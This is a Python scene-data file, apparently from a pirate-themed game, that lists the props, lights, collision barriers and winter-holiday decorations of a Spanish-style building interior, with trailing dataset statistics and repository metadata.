1.0), 'Visual': {'Model': 'models/props/mortar_pestle_stone'}}, '1166139339.62kmuller': {'Type': 'Prop_Groups', 'DisableCollision': True, 'Hpr': VBase3(57.552, 0.0, 0.0), 'Pos': Point3(15.438, -23.688, 0.048), 'Scale': VBase3(0.879, 0.879, 0.879), 'Visual': {'Color': (0.699999988079071, 0.699999988079071, 0.699999988079071, 1.0), 'Model': 'models/props/prop_group_G'}}, '1166139450.46kmuller': {'Type': 'Trunks', 'DisableCollision': True, 'Hpr': VBase3(-175.386, 0.0, 0.0), 'Pos': Point3(-11.623, -28.323, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Trunk_rounded_2'}}, '1166139482.6kmuller': {'Type': 'Trunks', 'DisableCollision': False, 'Hpr': VBase3(-100.398, 0.0, 0.0), 'Pos': Point3(17.54, -12.363, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Trunk_square'}}, '1166139534.14kmuller': {'Type': 'Furniture', 'DisableCollision': False, 'Hpr': VBase3(88.8, 0.0, 0.0), 'Pos': Point3(-19.032, -8.401, 0.172), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bench_bank'}}, '1166139664.39kmuller': {'Type': 'Bucket', 'DisableCollision': True, 'Hpr': VBase3(-38.995, 0.0, 0.0), 'Pos': Point3(4.278, 24.282, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bucket_handles'}}, '1166139726.17kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(-56.33, 0.0, 0.0), 'Pos': Point3(20.726, 15.931, 4.923), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/candle_holder'}}, '1166139823.07kmuller': {'Type': 'Pan', 'DisableCollision': False, 'Hpr': VBase3(-45.198, -0.006, 0.006), 'Pos': Point3(21.602, 17.485, 4.688), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/pan'}}, '1166139883.79kmuller': {'Type': 'Jugs_and_Jars', 'DisableCollision': False, 'Hpr': VBase3(2.971, 0.0, 0.0), 'Pos': Point3(21.796, 18.912, 4.7), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/largejug_B'}}, '1166140032.53kmuller': {'Type': 'Wall_Hangings', 'DisableCollision': False, 'Hpr': VBase3(0.0, 0.0, 0.0), 'Pos': Point3(-2.651, 29.91, 7.991), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/Map_01'}}, '1166143136.15kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(87.919, 0.0, 0.0), 'Pos': Point3(-19.128, 10.233, 7.623), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143173.57kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(87.919, 0.0, 0.0), 'Pos': Point3(-19.101, -8.222, 7.695), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143204.95kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': VBase3(-90.159, 0.0, 0.0), 'Pos': Point3(18.91, 9.923, 7.471), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143219.04kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Holiday': '', 'Hpr': VBase3(-90.159, 0.0, 0.0), 'Pos': Point3(19.055, -9.027, 7.695), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/lamp_candle'}}, '1166143244.09kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.798, 10.488, 17.608), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chandelier_jail'}}, '1166143275.89kmuller': {'Type': 'Light_Fixtures', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-0.592, -10.927, 17.594), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/chandelier_jail'}}, '1167972216.85kmuller': {'Type': 'Furniture', 'DisableCollision': True, 'Hpr': VBase3(44.958, 0.0, 0.0), 'Pos': Point3(-16.331, 26.168, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/bookshelf_spanish'}}, '1167972409.16kmuller': {'Type': 'Tools', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-19.259, 21.62, 0.0), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Model': 'models/props/butter_churn'}}, '1176423441.61dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '97.7273', 'DropOff': '6.8182', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(6.993, -61.677, 8.03), 'Intensity': '0.4242', 'LightType': 'SPOT', 'Pos': Point3(2.574, -18.447, 27.908), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.8700000047683716, 1.0, 1.0, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176423539.22dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '64.3182', 'DropOff': '39.5455', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(5.763, -56.906, 6.972), 'Intensity': '0.4848', 'LightType': 'SPOT', 'Pos': Point3(-1.976, 15.649, 24.802), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.8700000047683716, 1.0, 1.0, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176423736.28dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '60.0000', 'DropOff': '0.0000', 'FlickRate': 0.5, 'Flickering': True, 'Hpr': VBase3(0.0, 1.848, 0.0), 'Intensity': '0.5152', 'LightType': 'POINT', 'Pos': Point3(-0.034, -10.675, 13.873), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.95, 0.78, 0.64, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1176424160.2dzlu': {'Type': 'Light - Dynamic', 'Attenuation': '0.005', 'ConeAngle': '60.0000', 'DropOff': '0.0000', 'FlickRate': 0.5, 'Flickering': False, 'Hpr': VBase3(0.0, 1.848, 0.0), 'Intensity': '0.6061', 'LightType': 'POINT', 'Pos': Point3(-0.105, 11.422, 13.384), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0.95, 0.78, 0.64, 1.0), 'Model': 'models/props/light_tool_bulb'}}, '1185496415.31kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(4.727, 26.813, -0.119), 'Scale': VBase3(2.057, 1.302, 1.198), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}}, '1185496487.15kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(45.263, 0.0, 0.0), 'Pos': Point3(-15.061, 24.578, -0.449), 'Scale': VBase3(1.603, 1.0, 1.891), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496538.15kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-15.225, -28.682, -0.316), 'Scale': VBase3(2.053, 0.567, 2.235), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_cube'}}, '1185496598.36kmuller': {'Type': 'Barrel', 'DisableCollision': False, 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(8.521, -28.523, 0.0), 'Scale': VBase3(0.77, 0.77, 0.77), 'Visual': {'Color': (0.47999998927116394, 0.44999998807907104, 0.4099999964237213, 1.0), 'Model': 'models/props/barrel_grey'}}, '1185496634.87kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-105.442, 0.0, 0.0), 'Pos': Point3(6.902, -26.349, -0.415), 'Scale': VBase3(0.856, 1.0, 1.451), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496663.32kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(-134.387, 0.0, 0.0), 'Pos': Point3(11.183, -19.168, -0.394), 'Scale': VBase3(0.955, 1.0, 1.0), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1185496695.84kmuller': {'Type': 'Collision Barrier', 'DisableCollision': False, 'Hpr': VBase3(177.474, 0.0, 0.0), 'Pos': Point3(18.836, -16.153, -1.477), 'Scale': VBase3(0.944, 1.0, 1.196), 'Visual': {'Model': 'models/misc/pir_m_prp_lev_cambarrier_plane'}}, '1192813036.19akelts': {'Type': 'Effect Node', 'EffectName': 'torch_effect', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(16.066, 27.69, 0.728), 'Scale': VBase3(1.0, 1.0, 1.0), 'Visual': {'Color': (0, 0, 0.65, 1), 'Model': 'models/misc/smiley'}}, '1228171574.52kmuller': {'Type': 'Door Locator Node', 'Name': 'door_locator', 'Hpr': VBase3(-1.084, 0.0, 0.0), 'Pos': Point3(0.226, -30.04, -0.042), 'Scale': VBase3(1.0, 1.0, 1.0)}, '1228171636.05kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.562, -12.628, 9.043), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171658.06kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.497, -4.055, 8.9), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171680.97kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.522, 13.075, 8.571), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171681.0kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-19.48, 6.987, 8.709), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171718.55kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(90.0, 0.0, 0.0), 'Pos': Point3(-23.464, 2.055, 9.623), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1228171851.33kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.558, 12.771, 8.257), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.36kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.6, 6.683, 8.394), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.37kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.605, -5.139, 8.562), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171851.39kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(19.519, -12.932, 8.729), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoSwag_winter08'}}, '1228171985.95kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-90.0, 0.0, 0.0), 'Pos': Point3(23.294, 2.108, 9.247), 'Scale': VBase3(1.749, 1.749, 1.749), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1228172029.81kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-22.915, 0.0, 0.0), 'Pos': Point3(-14.676, 27.506, 8.319), 'Scale': VBase3(0.745, 0.745, 0.745), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172067.47kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(97.294, 0.0, 0.0), 'Pos': Point3(17.725, -11.752, 1.974), 'Scale': VBase3(0.877, 0.877, 0.877), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172094.37kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': '', 'Hpr': VBase3(20.62, 0.0, 0.0), 'Pos': Point3(17.402, -13.417, 1.908), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift02_winter08'}}, '1228172137.52kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(22.222, 0.0, 0.0), 'Pos': Point3(-14.48, 27.114, 2.476), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift03_winter08'}}, '1228172150.87kmuller': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(43.198, 0.0, 0.0), 'Pos': Point3(-15.74, 26.194, 4.277), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}}, '1257805377.33caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(29.215, 0.0, 0.0), 'Pos': Point3(-17.989, 24.828, 8.291), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257805389.23caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-80.692, 0.0, 0.0), 'Pos': Point3(-16.187, 26.439, 8.319), 'Scale': VBase3(1.0, 1.0, 1.0), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoGift04_winter08'}}, '1257805548.61caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(179.828, 0.0, 0.0), 'Pos': Point3(0.134, -29.849, 16.921), 'Scale': VBase3(1.647, 1.647, 1.647), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoRibbon_winter08'}}, '1257805573.24caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-179.622, 0.0, 0.0), 'Pos': Point3(13.583, -29.761, 16.921), 'Scale': VBase3(1.647, 1.647, 1.647), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoRibbon_winter08'}}, '1257805604.96caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-3.461, -2.873, 38.03), 'Pos': Point3(1.516, -29.874, 17.264), 'Scale': VBase3(3.099, 3.099, 3.099), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257805629.21caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(-13.08, -29.713, 16.646), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257805691.46caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-178.182, 2.38, 35.723), 'Pos': Point3(-1.065, -29.816, 17.292), 'Scale': VBase3(3.099, 3.099, 3.099), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257805757.37caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(0.206, -29.526, 16.511), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257805801.97caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(178.92, 6.382, 0.0), 'Pos': Point3(13.537, -29.768, 16.596), 'Scale': VBase3(1.795, 1.795, 1.795), 'VisSize': '', 'Visual': {'Model': 'models/props/pir_m_prp_hol_decoBow_winter08'}}, '1257891327.63caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(40.405, 0.0, 0.0), 'Pos': Point3(-1.49, 0.401, 2.948), 'Scale': VBase3(0.743, 0.743, 0.743), 'VisSize': '', 'Visual': {'Color': (0.6000000238418579, 1.0, 0.800000011920929, 1.0), 'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257891346.66caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(-180.0, -89.326, -179.539), 'Pos': Point3(-2.572, 0.139, 2.984), 'Scale': VBase3(0.929, 0.929, 0.929), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}, '1257891403.07caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': Point3(0.0, 0.0, 0.0), 'Pos': Point3(-2.297, 1.647, 2.948), 'Scale': VBase3(0.515, 0.515, 0.515), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_decoGift01_winter08'}}, '1257891450.24caoconno': {'Type': 'Holiday', 'DisableCollision': False, 'Holiday': 'WinterFestival', 'Hpr': VBase3(180.0, -89.326, 138.895), 'Pos': Point3(-2.13, -0.697, 2.993), 'Scale': VBase3(0.929, 0.929, 0.929), 'VisSize': '', 'Visual': {'Color': (0.800000011920929, 0.800000011920929, 1.0, 1.0), 'Model': 'models/props/pir_m_prp_hol_candycane_winter09'}}}, 'Visual': {'Model': 'models/buildings/interior_spanish_npc'}}}, 'Node Links': [], 'Layers': {}, 'ObjectIds': {'1153420207.67dzlu01': '["Objects"]["1153420207.67dzlu01"]', '1165347933.66kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1165347933.66kmuller"]', '1166138034.99kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138034.99kmuller"]', '1166138092.34kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138092.34kmuller"]', '1166138151.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138151.37kmuller"]', '1166138161.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138161.79kmuller"]', '1166138390.93kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138390.93kmuller"]', '1166138443.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138443.79kmuller"]', '1166138454.85kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138454.85kmuller"]', '1166138510.96kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138510.96kmuller"]', '1166138524.92kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138524.92kmuller"]', '1166138537.42kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138537.42kmuller"]', '1166138621.31kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138621.31kmuller"]', '1166138646.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138646.6kmuller"]', '1166138674.59kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138674.59kmuller"]', '1166138708.48kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138708.48kmuller"]', '1166138742.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138742.6kmuller"]', '1166138817.45kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138817.45kmuller"]', '1166138973.9kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166138973.9kmuller"]', '1166139009.4kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139009.4kmuller"]', '1166139125.65kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139125.65kmuller"]', '1166139259.49kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139259.49kmuller"]', '1166139339.62kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139339.62kmuller"]', '1166139450.46kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139450.46kmuller"]', '1166139482.6kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139482.6kmuller"]', '1166139534.14kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139534.14kmuller"]', '1166139664.39kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139664.39kmuller"]', '1166139726.17kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139726.17kmuller"]', '1166139823.07kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139823.07kmuller"]', '1166139883.79kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166139883.79kmuller"]', '1166140032.53kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166140032.53kmuller"]', '1166143136.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143136.15kmuller"]', '1166143173.57kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143173.57kmuller"]', '1166143204.95kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143204.95kmuller"]', '1166143219.04kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143219.04kmuller"]', '1166143244.09kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143244.09kmuller"]', '1166143275.89kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1166143275.89kmuller"]', '1167972216.85kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1167972216.85kmuller"]', '1167972409.16kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1167972409.16kmuller"]', '1176423441.61dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423441.61dzlu"]', '1176423539.22dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423539.22dzlu"]', '1176423736.28dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176423736.28dzlu"]', '1176424160.2dzlu': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1176424160.2dzlu"]', '1185496415.31kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496415.31kmuller"]', '1185496487.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496487.15kmuller"]', '1185496538.15kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496538.15kmuller"]', '1185496598.36kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496598.36kmuller"]', '1185496634.87kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496634.87kmuller"]', '1185496663.32kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496663.32kmuller"]', '1185496695.84kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1185496695.84kmuller"]', '1192813036.19akelts': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1192813036.19akelts"]', '1228171574.52kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171574.52kmuller"]', '1228171636.05kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171636.05kmuller"]', '1228171658.06kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171658.06kmuller"]', '1228171680.97kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171680.97kmuller"]', '1228171681.0kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171681.0kmuller"]', '1228171718.55kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171718.55kmuller"]', '1228171851.33kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.33kmuller"]', '1228171851.36kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.36kmuller"]', '1228171851.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.37kmuller"]', '1228171851.39kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171851.39kmuller"]', '1228171985.95kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228171985.95kmuller"]', '1228172029.81kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172029.81kmuller"]', '1228172067.47kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172067.47kmuller"]', '1228172094.37kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172094.37kmuller"]', '1228172137.52kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172137.52kmuller"]', '1228172150.87kmuller': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1228172150.87kmuller"]', '1257805377.33caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805377.33caoconno"]', '1257805389.23caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805389.23caoconno"]', '1257805548.61caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805548.61caoconno"]', '1257805573.24caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805573.24caoconno"]', '1257805604.96caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805604.96caoconno"]', '1257805629.21caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805629.21caoconno"]', '1257805691.46caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805691.46caoconno"]', '1257805757.37caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805757.37caoconno"]', '1257805801.97caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257805801.97caoconno"]', '1257891327.63caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891327.63caoconno"]', '1257891346.66caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891346.66caoconno"]', '1257891403.07caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891403.07caoconno"]', '1257891450.24caoconno': '["Objects"]["1153420207.67dzlu01"]["Objects"]["1257891450.24caoconno"]'}}
extraInfo = {'camPos': Point3(0, -14, 0), 'camHpr': VBase3(0, 0, 0), 'focalLength': 0.852765381336, 'skyState': -1, 'fog': 0}
| 4,211.142857 | 29,056 | 0.664631 | 4,010 | 29,478 | 4.825187 | 0.159352 | 0.027908 | 0.027908 | 0.024187 | 0.55145 | 0.470722 | 0.444467 | 0.390253 | 0.370148 | 0.349992 | 0 | 0.259147 | 0.070052 | 29,478 | 7 | 29,057 | 4,211.142857 | 0.446686 | 0.007735 | 0 | 0 | 0 | 0 | 0.568762 | 0.289544 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 6 |
811be09e8efd00c1aea606c4e23d536a962dbfd3
| 65 |
py
|
Python
|
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | null | null | null |
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | 5 |
2021-12-24T08:55:42.000Z
|
2022-02-13T16:59:30.000Z
|
maple/backend/singularity/__init__.py
|
akashdhruv/maple
|
11e562f51b18b2251ea507c629a1981b031d2f35
|
[
"MIT"
] | null | null | null |
